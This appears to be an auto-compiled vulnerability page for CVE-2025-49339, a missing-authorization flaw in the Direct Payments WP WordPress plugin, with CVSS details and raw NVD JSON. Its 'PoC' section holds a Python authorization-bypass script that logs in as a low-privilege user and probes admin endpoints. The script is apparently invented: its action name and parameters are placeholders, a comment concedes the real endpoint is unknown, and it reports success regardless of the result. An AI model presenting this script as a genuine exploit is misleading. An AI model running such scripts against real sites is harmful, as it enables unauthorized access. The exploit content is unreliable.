Security Vulnerability Report
中文
CVE-2025-49339 CVSS 4.3 MEDIUM

CVE-2025-49339

Published: 2025-12-31 17:15:44
Last Modified: 2026-04-28 19:33:00

Description

Missing Authorization vulnerability in Digages Direct Payments WP direct-payments-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Direct Payments WP: from n/a through <= 1.3.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Direct Payments WP <= 1.3.2
Direct Payments WP (n/a - 1.3.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49339 PoC - Direct Payments WP Authorization Bypass # Target: WordPress site with Direct Payments WP plugin <= 1.3.2 # Requirement: Low-privilege user account (subscriber role) import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" def exploit(): """ This PoC demonstrates the authorization bypass in Direct Payments WP. The plugin fails to properly check user capabilities before executing privileged operations. """ # Login as low-privilege user session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Logged in as low-privilege user") # Try to access admin functionality (should be forbidden for subscriber) # The exact endpoint depends on the vulnerable function admin_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/direct-payments-wp/v1/*" ] # Example: Direct Payments WP plugin sensitive action # This demonstrates accessing functionality without proper authorization for endpoint in admin_endpoints: # Malicious request to trigger unauthorized action exploit_data = { 'action': 'direct_payments_wp_admin_action', 'nonce': 'attacker_controlled_or_missing', 'param': 'sensitive_data' } response = session.get(endpoint, params=exploit_data) if response.status_code == 200 and 'sensitive' in response.text.lower(): print(f"[+] Authorization bypass successful at {endpoint}") print(f"[+] Response preview: {response.text[:200]}") return True print("[-] Exploitation completed - check manually") return True if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49339", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:43.970", "lastModified": "2026-04-28T19:33:00.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Digages Direct Payments WP direct-payments-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Direct Payments WP: from n/a through <= 1.3.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Digages Direct Payments WP permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Direct Payments WP: desde n/a hasta 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/direct-payments-wp/vulnerability/wordpress-direct-payments-wp-plugin-1-3-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}